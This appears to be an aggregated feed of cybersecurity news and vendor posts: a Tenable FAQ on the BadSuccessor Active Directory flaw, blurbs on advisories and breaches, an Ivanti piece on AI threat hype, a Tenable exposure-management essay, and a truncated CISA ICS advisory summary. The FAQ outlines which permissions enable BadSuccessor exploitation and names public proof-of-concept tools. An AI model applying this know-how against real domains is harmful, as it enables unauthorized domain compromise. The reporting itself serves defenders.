Frequently asked questions about “BadSuccessor,” a zero-day privilege escalation vulnerability in Active Directory domains with at least one Windows Server 2025 domain controller.BackgroundTenable’s Research Special Operations (RSO) and the Identity Content team has compiled this blog to answer Frequently Asked Questions (FAQ) regarding a newly disclosed zero-day in Active Directory called BadSuccessor.FAQWhat is BadSuccessor?BadSuccessor is the name of a zero-day privilege escalation vulnerability in Active Directory that was discovered and disclosed by Yuval Gordon, a security researcher at Akamai.According to Gordon, the flaw exists in delegated Managed Service Accounts (dMSAs), a service account type in Active Directory (AD) that was introduced in Windows Server 2025 to enable the migration of non-managed service accounts.What are the vulnerabilities associated with BadSuccessor?As of June 2, Microsoft had not assigned a CVE identifier for BadSuccessor. Microsoft is the CVE Numbering Authority (CNA) for its products. Since there are currently no patches available for BadSuccessor, no CVE has been assigned. If Microsoft does assign a CVE alongside patches for it, we will update this blog accordingly.How is BadSuccessor exploited?To exploit BadSuccessor, an attacker needs to be able to access a user account with specific permissions in AD, and at least one domain controller in the domain needs to be running Windows Server 2025.Based on Akamai’s research, even if an AD domain is not using dMSAs, nor operates at the 2025 functional level, all that is required is that a targeted user has either the permission to:Create a new dMSA (msDS-DelegatedManagedServiceAccount object class) in any container or organizational unit (OU)Abuse an existing dMSA by modifying its msDS-ManagedAccountPrecededByLink attributeWhen was BadSuccessor first disclosed?On May 21, Akamai published a blog post about BadSuccessor, which included a detailed overview of the flaw, as well as detection and mitigation guidance.How severe is BadSuccessor?BadSuccessor has the potential to be very severe, as exploitation could allow an attacker to achieve full domain, and then forest, compromise in an Active Directory environment. However, one mitigating factor is that it only affects domains with at least one Windows Server 2025 domain controller.How prevalent are AD domains with at least one Windows Server 2025 domain controller?Based on a subset of Tenable’s telemetry data, we found just 0.7% of AD domains have at least one Windows Server 2025 domain controller. This appears to be lower than other statistics we’ve seen reported.Was BadSuccessor exploited as a zero-day?As of June 2, there have been no indications that BadSuccessor has been exploited in the wild.Why is it called BadSuccessor?According to Gordon, the name “BadSuccessor” is tied to the fact that the user account (or dMSA) becomes the nefarious “successor” by inheriting the elevated privileges of another identity in the AD environment.6/ We named this attack BadSuccessor, because that's exactly what the dMSA becomes - the unintended heir to a high-privilege identity.A successor, with all the right keys.— Yuval Gordon (@YuG0rd) May 21, 2025Is there a proof-of-concept (PoC) available for BadSuccessor?Yes, there are several proofs-of-concept (PoCs) for BadSuccessor available on GitHub, including a.NET implementation called SharpSuccessor. It is also available in NetExec, the successor to the infamous CrackMapExec hack tool. It was also added to BloodyAD, the Active Directory privilege escalation framework.Are patches or mitigations available for BadSuccessor?As of June 2, there were no patches available for BadSuccessor. However, in the Akamai blog post from May 21, Microsoft indicated they would “fix this issue in the future.” If and when a patch becomes available, we will update this section.Akamai’s blog post includes details on detecting BadSuccessor as well as mitigation suggestions.Has Tenable released any product coverage for these vulnerabilities?While Microsoft has not yet released patches for BadSuccessor, Tenable Identity Exposure customers can utilize our recently released (v3.95) Indicator of Exposure (IoE) for BadSuccessor.Once Microsoft assigns a CVE and releases patches, we will update this section with additional Tenable coverage.Get more informationBadSuccessor: Abusing dMSA to Escalate Privileges in Active DirectoryJoin Tenable's Research Special Operations (RSO) Team on the Tenable Community.Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.

The internet is full of bots. They generate almost as much traffic as people do.  But while many of them are malicious scrapers or spammy impostors, let’s not forget about the many “good” bots that serve legitimate functions, like indexing your content for Google search or generating preview cards when your link gets shared on […] The post The Ultimate 2025 List of Web Crawlers and Good Bots: Identification, Examples, and Best Practices appeared first on HUMAN Security.

Are your real-time application performance needs met? These applications needs special attention that only a robust SD-WAN solution can deliver to always ensure an exceptional user experience. Learn how Versa Secure SD-WAN can help you achieve this goal seamlessly. The post Ditch the Glitches, Embrace Exceptional Voice and Video Experience with Versa Secure SD-WAN first appeared on The Versa Networks Blog.

[Control systems] CISA ICS security advisories (AV25–308)

The compliance company said the customer data exposure was caused by a product change.

The healthcare sector, perhaps more than any other, needs to scrutinize the balance between data utility and data privacy. Healthcare organizations must manage large amounts of sensitive data while complying with stringent regulations such as the Health Insurance Portability and Accountability Act (HIPAA). For IT teams seeking to implement AI-augmented service management, that responsibility weighs heavily.  A notable recent incident involved over four million customers affected by a data breach at Blue Cross Blue Shield, where Google Analytics had been configured in a manner that allowed member data to be shared with Google Ads, likely including protected health information. Forward-looking IT leaders want to take advantage of advanced IT service management capabilities to improve operational efficiency, including emerging AI applications. But to avoid becoming the latest headline, they also need the highest standards of data protection. In this article, we’ll go into how Ivanti integrates with Protecto to do just that. Where healthcare compliance and AI intersect The myriad regulations that healthcare organizations must follow (HIPAA, GDPR, CCPA and others) are designed to protect patient data and ensure that it is handled securely and ethically. Data security and privacy are fundamental aspects of patient trust, and noncompliance can result in significant fines and legal actions. At the same time, AI and ML technologies require access to large datasets – data that may include sensitive information that is subject to these stringent requirements. To add another layer of complexity, healthcare organizations are often large and complex, with multiple departments and locations, which means any data privacy solutions need to be able to scale without compromising performance. Healthcare requirements for ITSM IT organizations that want to take advantage of advanced ITSM use cases without fear of compromising data privacy have specific requirements – requirements that the integration between Ivanti Neurons for ITSM and Protecto deliver. Data masking Intelligent data masking identifies and masks sensitive information such as PII and PHI. This lets AI agents operate on data without exposing sensitive elements, preventing data leaks and reducing misuse. Additionally, data masking ensures that the context and utility of the information remain intact, enabling effective analysis and decision-making. Role-based access controls Role-based access controls and policy-driven unmasking ensure data is only accessed by authorized users with appropriate roles. Only users with the necessary permissions can access or unmask sensitive data. Audit trails To comply with regulations, healthcare organizations need a comprehensive audit trail of how sensitive data is accessed, used and protected. Detailed logs simplify compliance workflows and support regulatory audits. Seamless integration Protecto integrates with Ivanti APIs, which allows existing processes to remain uninterrupted – and for IT teams to deliver the best possible service – adding a layer of protection without disrupting operations. Scale A single instance of Protecto can support over 3,000 tenants, safeguarding the data of millions of users. It can handle large-scale deployments while maintaining operational resilience, making it a reliable choice for AI initiatives. Ivanti and Protecto’s partnership The partnership between Ivanti and Protecto brings immense value to Ivanti customers in highly regulated sectors with heightened data privacy concerns. Already available features such as custom masking policies, on-premises and private cloud alternatives, and improved audit logs and reports ensure customers can meet compliance requirements with confidence. Our commitment to research and development in AI, machine learning and data protection mean customers will always be at the forefront of managing large-scale datasets. Our work with healthcare organizations, regulatory bodies and technology partners helps customers put in place practical data protection solutions without compromising IT efficiency. Combining Ivanti Neurons for ITSM with advanced data security and privacy features ensures that our customers’ ITSM operations are both efficient and compliant with the most stringent guidelines, whether they’re in the healthcare industry or any other highly regulated field. Ivanti’s partner ecosystem Ivanti works with a wide range of technology partners like Protecto to help customers make the most of their investment in Ivanti solutions. To learn more, visit the Ivanti Partner Markeplace.

To help security teams protect critical assets while ensuring business continuity, Microsoft Defender developed automatic attack disruption: a built-in self-defense capability. The post Discover how automatic attack disruption protects critical assets while ensuring business continuity appeared first on Microsoft Security Blog.

We’re proud to announce that ThreatSTOP is now using Machine Learning (ML) to enhance the protections we deliver to our customers.

The spyware maker claims the damages it was ordered to pay are "excessive," and that the jury wanted to “bankrupt” the company.

Cybersecurity researchers have discovered a new cryptojacking campaign that's targeting publicly accessible DevOps web servers such as those associated with Docker, Gitea, and HashiCorp Consul and Nomad to illicitly mine cryptocurrencies. Cloud security firm Wiz, which is tracking the activity under the name JINX-0132, said the attackers are exploiting a wide range of known misconfigurations and...

IBM security advisory (AV25-307)

We’ll decode these two tools—and show you how to use them both to work more efficiently. The post Less TODO, more done: The difference between coding agent and agent mode in GitHub Copilot appeared first on The GitHub Blog.

Microsoft and CrowdStrike are teaming up to create alignment across our individual threat actor taxonomies to help security professionals connect insights faster. The post Announcing a new strategic collaboration to bring clarity to threat actor naming appeared first on Microsoft Security Blog.

AI emerges as the top concern for security leaders, surpassing concerns of ransomware.

Let’s face it—managing encrypted traffic is no walk in the park. As businesses double down on security and privacy, SSL/TLS encryption is now everywhere. That’s great news for data protection, but it also means more complexity for traffic management and visibility. That’s exactly where ADC 4.2 steps in. This release brings a trio of powerful […] The post ADC 4.2 Is Here: Flexible, Smarter SSL Handling for a Safer Network appeared first on Hillstone Networks.

The country will require certain organizations to report ransomware payments and communications within 72 hours after they're made or face potential civil penalties.

The unpatched security vulnerabilities in Consilium Safety's CS5000 Fire Panel could create "serious safety issues" in environments where fire suppression and safety are paramount, according to a CISA advisory.

As investors, ICA and Colorado Enterprise Fund have both incorporated job quality assessments as part of their lending and investment process. This conversation explores the various tools capital allocators possess to help and incentivize small businesses to create quality jobs for their employees. The post Job Quality & Capital appeared first on The Aspen Institute.

Dell security advisory (AV25-306)

Announcing Graylog 6.3.0-beta.4 Graylog 6.3.0-beta.4 Release date: 2025-06-02 Upgrade notes DEB and RPM packages are available in our repositories Docker Compose Container images: Graylog Open Graylog Enterprise Graylog Data Node Tarballs for manual installation: Graylog Server Graylog Server (bundled JVM, linux-x64) Graylog Server (bundled JVM, linux-aarch64) Graylog Enterprise Server Graylog Enterprise Server (bundled JVM, linux-x64) […] The post Announcing Graylog 6.3.0-Beta.4 appeared first on Graylog.

Three security vulnerabilities have been disclosed in preloaded Android applications on smartphones from Ulefone and Krüger&Matz that could enable any app installed on the device to perform a factory reset and encrypt an application. A brief description of the three flaws is as follows - CVE-2024-13915 (CVSS score: 6.9) - A pre-installed "com.pri.factorytest" application on Ulefone and...

In recent years, the LDAP protocol has become an increasingly popular target for attackers looking to escalate privileges, move laterally, or persist inside Active Directory environments. As more researchers explore the depths of Microsoft’s legacy protocols, more vulnerabilities continue to surface — and many of them abuse LDAP in novel and unexpected ways.  Just in the past few years, we've seen a surge in LDAP-based attack techniques and vulnerabilities,…

Announcing Graylog Forwarder 6.5-Beta.2 This is a bug-fix release that improves Graylog Forwarder functionality. Please read on for information on what has changed. Download Links 6.5-beta.2 Release date: 2025-06-02 Operating system packages: DEB Package RPM Package Docker Compose Container image: Docker Hub docker pull graylog/graylog-forwarder:6.5-beta.2-1 Tarballs for manual installation: Graylog Forwarder   Changelog Graylog Forwarder […] The post Announcing Graylog Forwarder 6.5-Beta.2 appeared first on Graylog.

Ubuntu security advisory (AV25-305)

Authorities have seized the domains of AVCheck, one of the largest counter antivirus services used by cybercriminals around the world

Red Hat security advisory (AV25-304)

Check out the May updates in Compliance Plus so you can stay on top of featured compliance training content.

Qualcomm has shipped security updates to address three zero-day vulnerabilities that it said have been exploited in limited, targeted attacks in the wild. The flaws in question, which were responsibly disclosed to the company by the Google Android Security team, are listed below - CVE-2025-21479 and CVE-2025-21480 (CVSS score: 8.6) - Two incorrect authorization vulnerabilities in the Graphics...

The White House’s latest spending proposal projects nearly 1,000 jobs will be slashed at the nation’s lead civilian cyber agency. Related cyber and intel programs across government also face funding rollbacks.

Discover practical strategies to enhance cloud cyber resilience, ensuring your business operations remain secure and agile. Read the article to learn more. The post 5 Tips to Build Cloud Cyber Resilience appeared first on Fidelis Security.

At the heart of a more equitable, dynamic, and resilient workforce lies a simple but profound idea: All learning should count, especially when skill attainment can be verified. Whether acquired in a classroom, on a factory floor, in the military, or through the sheer resilience of navigating life’s complexities, learning happens everywhere. People develop competencies—knowledge, […] The post Making All Learning Count: Building a Skills-First Future for Everyone appeared first on The Aspen Institute.

Organizations need to abandon perimeter-based security for data-centric protection strategies in today's distributed IT environments.

The US needs to establish a clear framework to provide reasonable guardrails to protect its interests — the quicker, the better.

We're excited to announce the latest update in OpenText eDiscovery CE 25.2, introducing a powerful new tool that transforms how legal teams organize and analyze evidence. Here's what's new: OpenText eDiscovery Chronology In modern litigation and investigations, organizing massive volumes of digital evidence chronologically to understand the who, what, where, and when of a matter can be daunting, labor-intensive, expensive, and potentially risky. The new OpenText™ eDiscovery Chronology addresses this challenge head-on.  This interactive chronological narrative building tool helps legal teams track, organize, and analyze evidence by date—with full control of event metadata and complete audit trail capabilities. With Chronology, legal teams can leverage technology to streamline an otherwise manual task and quickly gain a clearer understanding of the sequence of events that may make or break a case.  With integrated visual Chronology, legal teams can:  Easily identify potential gaps or inconsistencies in evidence earlier, reducing risks and unpleasant surprises  Save time by organizing events and facts without having to copy and paste text and link documents in Excel, Word, or third-party software  Quickly zero in on specific events or facts at any time, for faster, easier, and more thorough client reporting, early case assessment, and preparation for depositions, hearings, settlement discussions, and trial  Chronology is a key feature that has been frequently requested by our customers and represents a significant enhancement to our platform's capabilities. In addition to the new Chronology feature, OpenText continues to release enhancements to our existing capabilities.    OpenText eDiscovery Aviator Key Document Summary – Now exportable!  Initially released in April 2024, Aviator Key Document Summary empowers legal teams to create an AI-generated summary of key documents, complete with links to the documents, for improved document review efficiency and rapid insight into the case.  Now with CE 25.2, legal teams can more easily share document summaries with team members and clients with the ability to export Key Document Summaries, complete with working document links.  Aviator Review – More intuitive than ever  In our ongoing effort to increase efficiency and automate first-pass review, we have simplified the OpenText eDiscovery Aviator Review process to two simple steps:   Input your review criteria  Identify the designated document set on which you want Aviator Review to run It is really that easy, and after the Aviator results are returned, legal teams have the option to quickly QC the document set using the “compare with human review toggle” and selecting the coded review field to be used for comparison.  Expanded bulk redaction capabilities   Accurate and consistent redaction of privileged, confidential, or sensitive information across all document formats is a critical component for reducing production risks.   Inadvertent production of privileged or sensitive information is a legal team’s worst nightmare.  As the type of data involved in litigation and investigations continues to become more diverse—going far beyond email and Word documents—it's essential that bulk redaction tools keep pace.  That's why we're pleased to expand OpenText eDiscovery bulk redaction to support the chat-specific redaction view.  We have also added support for Social Security Number patterns in the Bulk Redaction wizard for the native Excel viewer, the audio/video viewer (Cloud only), and the HTML chat viewer.    Additional new redaction capabilities include:  New “change redaction” functionality for the near native Excel viewer, the audio/video viewer (Cloud only), and the HTML chat viewer The ability to centrally manage the addition and deletion of redaction reasons from within the Review & Analysis module The addition of a dedicated Regular Expressions (RegEx) tester to support users writing their own customized RegEx for bulk redaction An improved RegEx pattern search for birthdates These updates in OpenText eDiscovery CE 25.2 represent our ongoing commitment to providing powerful, user-friendly tools for modern eDiscovery workflows. By introducing new functionality and enhancing existing key features, we're responding to our most frequent customer requests and helping legal teams work more efficiently and effectively than ever before, delivering better outcomes for their clients and organizations.  The post OpenText™ eDiscovery CE 25.2: Introducing eDiscovery Chronology for enhanced evidence organization appeared first on OpenText Blogs.

SINCON, May 22-23, Singapore  First up is SINCON 2025, held on May 22–23 at voco Orchard Singapore.  This year’s event focused on advancing cybersecurity through technical exploration and innovation, with a strong emphasis on proactive defense strategies and knowledge sharing. Our CEO, Ken Bagnall, gave a talk on “Finding Adversary Infrastructure Before the Attack with […] The post Silent Push Events: May 2025 appeared first on Silent Push.

SINCON, May 22-23, Singapore  First up is SINCON 2025, held on May 22–23 at voco Orchard Singapore.  This year’s event focused on advancing cybersecurity through technical exploration and innovation, with a strong emphasis on proactive defense strategies and knowledge sharing. Our CEO, Ken Bagnall, gave a talk on “Finding Adversary Infrastructure Before the Attack with […] The post Silent Push Events: May 2025 appeared first on Silent Push.

The Sysdig Threat Research Team (TRT) recently observed a malicious threat actor targeting a misconfigured system hosting Open WebUI, a... The post Attacker exploits misconfigured AI tool to run AI-generated payload appeared first on Sysdig.

The Sysdig Threat Research Team (TRT) recently observed a malicious threat actor targeting a misconfigured system hosting Open WebUI, a... The post Attacker exploits misconfigured AI tool to run AI-generated payload appeared first on Sysdig.

You know what's interesting about data breaches? Everyone focuses on credit card numbers and financial data, but the reality is that every piece of information has value to someone.

Researchers at IBM Security warn that a major phishing campaign is targeting users in France, incorporating leaked personal data to make the emails more convincing.

Customers have recognized Sophos for the 4th consecutive time

For anyone who attended Mobile World Congress (MWC) in March, talk of artificial intelligence (AI) was everywhere. No matter what booth you visited, AI was the conversation du jour. In some respects, it was a bit overwhelming. There is certainly no doubt that AI holds the promise of important benefits for telcos. The...

Roundcube informerar om en sårbarhet (CVE-2025-49113) i Roundcube webmail. [1]

With AI at the center of media and industry focus, cybersecurity teams are increasingly putting pressure on themselves to prepare for AI-fueled cyber attacks. According to Ivanti’s 2025 State of Cybersecurity research, half of IT security professionals ranked “yet unknown weaknesses” as a high or critical threat – the same as or higher than compromised credentials, supply chain risks, DDoS attacks and other real-world threats. These “unknown” concerns remain more hype than substance for the moment. In fact, the Picus 2025 Red Report found no notable uptick in the use of AI-driven malware techniques in 2024. The report goes on to state that “AI enhances productivity but doesn't yet redefine malware.” In other words, adversaries are leveraging AI in their attacks – automating phishing content, debugging malicious code, accelerating reconnaissance – but they’re not creating fundamentally new attack classes. Traditional attack techniques still dominate the cyber landscape, yet many teams remain fixated on speculative threats. The big takeaway? Stop worrying about hypothetical AI-powered launches from beyond the front lines and focus on defending against the threats that are putting your organization most at risk today. Real threats vs. AI hype: misaligned risk prioritization Ever since ChatGPT started capturing headlines in November 2022, the world has been saturated with anticipation of the potential impact of AI. Analysts are projecting AI will inject $15.7 trillion into the global economy by 2030, and the tech is also increasingly shaping daily workflows across industries. So, it’s no surprise that AI is dominating boardroom talk. Since CISOs and security leaders are tasked with preparing for worst-case scenarios, they’re understandably alert to what AI could do in the wrong hands. However, an issue arises when much of this attention is focused on novel AI-generated threats. Less focus is being paid to the main way that we’re already seeing attackers use AI — as a tool to amplify familiar existing threats. AI synthetic digital content — such as manipulated media and deepfakes — and AI-based spoofing attacks — such as using gen AI to mimic someone’s voice and tone — were both top-ranked predicted AI-related threats for 2025, with 53% of security professionals rating their threat levels as “high / critical.” Yet in practice, these AI-generated threat types are not yet as commonplace as traditional phishing techniques and ransomware attacks where we see AI speed up attackers’ efforts to an unprecedented rate. The result is a risk prioritization model that skews toward theoretical rather than real-life considerations. Critical gaps in threat preparedness persist Ivanti’s report also paints a troubling picture: real-world threats are outpacing organizational preparedness across multiple critical categories. The problem isn’t a lack of awareness; rather, it’s that security hygiene is inconsistent. The gaps are still there: weak credential management, patch delays, untested incident plans and API / third-party blind spots. In short, new risks coming from AI aren’t the issue – it’s more that AI is strengthening existing threats. Consider the top five areas in which our research found defenders are falling behind – not because security teams lack awareness, but rather, the fundamentals are being inconsistently enforced, and AI is helping adversaries exploit them more efficiently: 1. Ransomware attacks Ransomware remains a top threat with 58% of security professionals ranking it as high/critical. Yet only 29% say their teams are prepared to defend themselves against ransomware attacks. Despite this, many organizations still lack tested backup and recovery protocols, haven’t segmented their networks effectively and run outdated IR plans. When it comes to gen AI’s ability to ramp up ransomware threats, security teams may face even quicker code iteration, more automated vulnerability chaining and adaptive payload construction that can circumvent defenses. Attackers are also using AI to create virtual simulations for testing ahead of deployment – and adjusting their strategies accordingly. 2. API-related exposures The increasing use of API-supported software has also increased the risk of API exposures. API-related vulnerabilities was the second highest ranked threat type by the security professionals Ivanti surveyed with 52% rating it a “high / critical” threat. Yet just 31% of security teams said they felt “very prepared” to defend against API attacks — a 21% preparedness gap. Threat actors can now automate the discovery of endpoints through traffic analysis, reverse engineering poorly documented APIs and generating fuzzing inputs to identify logic flaws. Once they’re inside, they exploit permission creep, unvalidated input or weak auth mechanisms. Still on the cybersecurity front, AI can also be a useful tool to analyze large amounts of API traffic data in real-time to identify issues and patterns that may indicate an attack. 3. Software vulnerabilities Overall software vulnerabilities had a worrying 19-point gap between “high / critical” threat level and preparedness. Security teams still struggle with critical issues around departmental silos, inaccessible data and tech debt that make managing their expanding attack surface challenging. Ivanti’s report found that 45% of security teams said they lacked data to confidently identify specific vulnerabilities. Furthermore, more than half of organizations surveyed — 51% — admitted to using software that has reached end-of- life and therefore would not be regularly updated and patched to ensure security compliance. Security and IT teams are struggling to maintain patch hygiene, especially across legacy systems and shadow IT environments. This isn’t only a tooling problem. Patching cycles and security response times are slowed by security and IT having misaligned priorities – and AI is widening the gap between those who patch quickly and those who wait. 4. Compromised credentials Like software vulnerabilities, the preparedness gap for compromised credentials also sits at 19%. Stolen credentials are an easy way in for attackers, even more so when paired with AI’s capabilities to scale credential stuffing attacks, simulate human-like login behavior and adapt to multi-step authentication flows. Gen AI is also utilized to analyze leaked datasets and identify reused passwords or credential patterns across platforms. What was once a manual grind is now becoming a fully automated infiltration process. And yet, MFA coverage remains patchy, and identity governance is often an afterthought. AI is simply exposing how poorly it’s implemented. 5. Phishing Phishing has long been a mainstay method for attackers to breach an organization’s defenses. Yet even now, only 37% of cybersecurity teams say they’re readily prepared to defend against phishing threats. This lag has never been more of a concern as we’ve seen how phishing methods evolve with AI and attackers have the capabilities to create convincing deepfake content and personalize attacks using scraped public data. Organizations clearly have a lot of work to do to bridge the gaps in their defenses and combat prominent threats because we know that these threats are not going away but continuing to evolve and develop. However, there is some positive news behind the AI threat hype which is that AI and automation can also serve as powerful tools to bolster cybersecurity teams' efforts as well. AI cybersecurity tools: foe or friend? Exploring the other side of the AI conversation, cybersecurity leaders have begun to view AI as an asset in bolstering defenses. Ivanti’s 2024 report “Gen AI and Cybersecurity: Risk and Reward” found that 90% of security professionals believe that gen AI benefits security teams as much or more than threat actors. Some ways organizations today use AI tools include automating threat detection and triage, accelerating log analysis, increasing anomaly spotting and simulating different attack methods. Gen AI does not need to be only a looming threat but should be seen as another tool to help security teams more effectively identify weaknesses in their defenses and proactively address vulnerabilities. Recommendations to refocus on cybersecurity fundamentals AI threats are of course real threats, and cybersecurity teams shouldn’t disregard the growing use of AI in cyber attacks. However, with cybersecurity and IT teams dealing with a lack of talent / skills and battling burnout, they need to prioritize security resources on the most prominent and impactful types of threats. Rather than spend time, budget and personnel crafting a security strategy around speculative AI threats, defenders should be doubling down on security best practices and fundamentals such as: Identifying attack surface gaps Remediating existing exposures Ensuring rigorous credential protection and access controls Your vulnerability and threat management strategy needs to focus primarily on proactively identifying and managing the most pressing threats to your organization rather than on trying to guard against speculated future threats, especially when unknown. Security teams can’t know the threat level of abstract unidentified threats and thus can’t act on them. It’s more beneficial to gain a comprehensive, real-time view of your attack surface and use that to understand your organization’s current risk posture. Real cybersecurity leadership isn’t about chasing hypotheticals. Rather, it’s about systematically reducing exposure through full visibility, quick validation and risk-based prioritization. Here’s what today’s leading security leaders are doing, and what you should do to stay ahead: 1. Continuously monitor your complete attack surface Teams can’t protect what they’re not able to see. As such, ensure a real-time, continuously updating view of every exposure point to have visibility into the entire landscape. With limited resources, you cannot prepare for every unknown potential threat. Instead, teams need a framework for assessing their attack surface and classifying known and unknown vulnerabilities. 2. Prioritize threat response based on overall impact threat and risk to business Go beyond scanning for existing gaps and opportunities – run simulations, use red teams and adopt behavior-based analytics to validate which exposures are actually exploitable. Leverage frameworks like MITRE ATT&CK, threat intelligence and your own readings to identify exposures and prioritize remediation efforts based on an established risk framework that considers critical factors such as exploitability and overall impact to your organization’s wider business objectives. 3. Leverage AI to accelerate defenses AI is a threat vector, but it’s also a force multiplier for cybersecurity teams. Use AI in cybersecurity to its fullest potential, surfacing anomalies in real time, automating log analyses, generating simulations and reducing manual obligation. The hype is real, but especially in the way you apply it in such a way that it speeds up and tightens response. Real cybersecurity leadership is forged in present-day focus and near-future developments. This means making surgical decisions under pressure, identifying actual risk and driving measurable reduction.  Forget the future unknowns – focus on what’s known Research reveals that many security teams are overestimating the predicted risks of AI-powered threats, and they’re underprepared to defend against the actual threats targeting them today. Cybersecurity teams need to realign cyber defense strategies to reflect reality or risk unnecessary damages. The truth is, AI may redefine the scale and speed of cyber attacks, but even with new AI capabilities, today’s attackers are still using the same old tricks. The winning cybersecurity strategies won’t put all of their time and resources into building AI-resistant walls – they’ll be the ones proactively readying defenses to fend off the threats right in front of them. Check out Ivanti’s 2025 Cybersecurity Report to benchmark your readiness and close the preparedness gap.

Each Monday, the Tenable Exposure Management Academy provides the practical, real-world guidance you need to shift from vulnerability management to exposure management. In this post, Tenable’s chief security officer Robert Huber looks at how exposure management can help you move beyond silos. You can read the entire Exposure Management Academy series here.The way we use technology — in IT, cloud security, operational technology (OT), internet of things (IoT), AI and countless applications — has led to a corresponding array of specialized security tools. Think about all the tools you use: vulnerability assessment, identity security, endpoint detection and response (EDR), data loss prevention (DLP), cloud native application protection platforms (CNAPP), mail protection, cloud access security broker (CASB), mobile device management (MDM) and privilege access management (PAM). That’s a lot of tools — and a lot of silos. But it doesn’t end there. Each of those tools has a subset of capabilities that can result in even more silos across your security program. Of course, all of this reflects the issues we face and the way our organizations are structured. But, sadly, attackers don’t care about our org charts or toolsets. And thank goodness they haven’t figured out how to use pivot tables yet!They just look for weaknesses, exploit them and move laterally across domains to achieve their goals. In fact, those silos we’ve built can inadvertently help them by hindering communication and context between teams, making it difficult to see our true exposures — or the risks that pose a real threat.As a security leader myself, I know this pain firsthand. Buried in fragmented dataBefore adopting a more unified approach, I constantly felt like I was buried in fragmented data from countless tools and teams. Much of my day was lost to context-switching, trying to manually piece together a coherent picture from disconnected silos. This makes communicating clear priorities incredibly difficult. You often can't compare apples-to-apples, leading to subjective decisions about which risk truly matters most. It’s an exhausting, inefficient cycle that makes it hard to confidently answer a key question: "What should we focus on right now?" It also makes it tough to report accurately on our risk posture.This struggle highlights why distinguishing significant exposures from the background noise of all possible weaknesses is so critical for effective risk management. If you want to reduce your risk, you need to identify the problems that truly matter most to your organization. Key questions to ask yourself as you evaluate your organization’s exposures include:Is it preventable? Most breaches start with something that could have been fixed, such as a misconfiguration, a known vulnerability or unnecessary privileges.Is it exploitable? An attacker needs a way to actually use the weakness. This could be via a known exploit code, weak passwords or multi-factor authentication (MFA) identity compromise.Is it impactful? A weakness that results in lost revenue, data theft or operational downtime could significantly harm the organization's mission. Linking technical risk to potential business impact is key.What’s holding security leaders back?Too often, we approach security in fragments, unlike attackers who look for any viable path. This leaves us struggling to be strategic. Some of the common roadblocks include:Lack of a unified view: Different tools focus on specific domains or risk types, so no single platform provides a complete view of the attack surface.Inconsistent risk scoring: Each tool uses its own metrics, which makes it hard to compare relative risk across the environment or understand the cumulative risk associated with critical assets.Missing technical context: If you don’t connect the dots between assets, identities and their associated risks, it's impossible to understand the likely attack paths available to adversaries.Missing business context: Security data often lacks information about which assets support critical business functions, hindering the ability to prioritize based on potential business impact.Proactive prevention just makes senseHistorically, a significant portion of our security investments focused on detecting and responding to attacks already in progress. This makes sense because it’s where breaches cause obvious damage.But regulations and best practices are changing. Rules from the U.S. Securities and Exchange Commission (SEC) (requiring reporting of material impact within four days for public companies) and the Cybersecurity and Infrastructure Security Agency (CISA) (requiring reporting of “substantial cyber incidents” within three days for critical infrastructure) mandate much faster transparency and accountability. The timeframe for understanding and disclosing significant incidents is shrinking dramatically.This pressure, combined with the high cost of breaches, increases the strategic importance of finding and fixing significant exposures before they lead to reportable incidents and material impact. Investing proactively in understanding and reducing exposure is often far less costly and disruptive than managing the fallout of a major breach. Reduce risk and increase security ROI.Optimizing prioritization and preventing breachesUnderstanding how breaches happen and the limitations of siloed security points to the need for a more integrated, exposure-focused strategy. This isn't about abandoning detection and response capabilities. On the contrary, it’s about augmenting those capabilities by strengthening preventative security to better understand and prioritize risks before they cause harm.Solving this requires a structured approach. As my colleague Nathan Dyer wrote in Five Steps to Move to Exposure Management, the core principles involve:Gaining comprehensive visibility across the entire attack surface, including assets and identitiesIdentifying all forms of preventable risk, such as vulnerabilities, misconfigurations and privilege issues with consistent, contextualized scoringCritically aligning technical risk with business context to understand potential impact and prioritizing remediation on the exposures and attack paths, including key choke points, that pose the greatest threat to critical functionsContinuously measuring and communicating exposure to optimize security investments and report effectively to stakeholders, including the boardExposure management platforms support this lifecycle, providing capabilities to aggregate disparate data, calculate risk scores (like asset exposure scores, vulnerability priority rating, asset criticality rating) that incorporate exploitability and criticality, map assets to business functions, visualize attack paths, identify choke points for efficient remediation, and provide dashboards for tracking and reporting exposure trends against internal goals or industry benchmarks.Ultimately, by breaking down data silos and adopting an exposure management mindset, security leaders can gain a more holistic view of their attack surface and true business risk. This enables better resource allocation, more defensible prioritization, clearer communication about security posture and, ultimately, a more effective preventative security program aligned with organizational objectives.TakeawaysHere’s my advice to security leaders fighting silos and looking to move to exposure management.Think like an attacker: Adversaries exploit seams between siloed views. Security strategy must strive for a unified understanding of the attack surface.Focus on material exposure: Prioritize risks that are preventable, exploitable and demonstrably impactful to critical business functions, not just technically severe in isolation.Drive strategic outcomes: Implementing an exposure management approach enables more effective resource allocation, clearer communication of risk posture to stakeholders (including the board) and ultimately, a more defensible and efficient security program.Have a question about exposure management you’d like us to tackle?We’re all ears. Share your question and maybe we’ll feature it in a future post. MktoForms2.loadForm("//info.tenable.com", "934-XQB-568", 14070);

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) released five new ICS advisories this week, drawing attention to severe vulnerabilities affecting industrial and medical systems worldwide. Among the most notable disclosures are flaws in Siemens SiPass, Consilium’s CS5000 Fire Panel, Instantel Micromate, and others. CISA's advisories, released under alert codes ICSA-25-148-01 through ICSA-25-148-04, along with ICSMA-25-148-01, include vulnerability scores, mitigation strategies, and analysis of potential exploitation. Organizations across the manufacturing, healthcare, transportation, and energy sectors are urged to review these findings promptly. CISA’s New ICS Advisories this Week Siemens SiPass Advisory (ICSA-25-148-01) Among the high-profile advisories is a serious vulnerability in Siemens SiPass, a widely used access control system in critical manufacturing environments. Vulnerability: Improper Verification of Cryptographic Signature (CWE-347) CVE: CVE-2022-31807 CVSS v3.1 Score: 6.2 CVSS v4 Score: 8.2 This flaw could allow an attacker to install malicious firmware on affected devices. If exploited remotely or via a man-in-the-middle attack, a bad actor could compromise system integrity without needing physical access. All versions of SiPass integrated AC5102 (ACC-G2) and ACC-AP are affected. Siemens has not issued a fix yet but recommends enabling TLS encryption to protect firmware transfers. The company also stresses the importance of operating devices in secure IT environments, following Siemens’ industrial security guidelines. Siemens SiPass Integrated (ICSA-25-148-02) Another ICS advisory was issued for Siemens SiPass Integrated, specifically addressing a remote denial-of-service vulnerability. Vulnerability: Out-of-bounds Read (CWE-125) CVE: CVE-2022-31812 CVSS v3.1 Score: 7.5 CVSS v4 Score: 8.7 This issue affects versions prior to V2.95.3.18 and could allow an unauthenticated attacker to crash the application by sending malformed 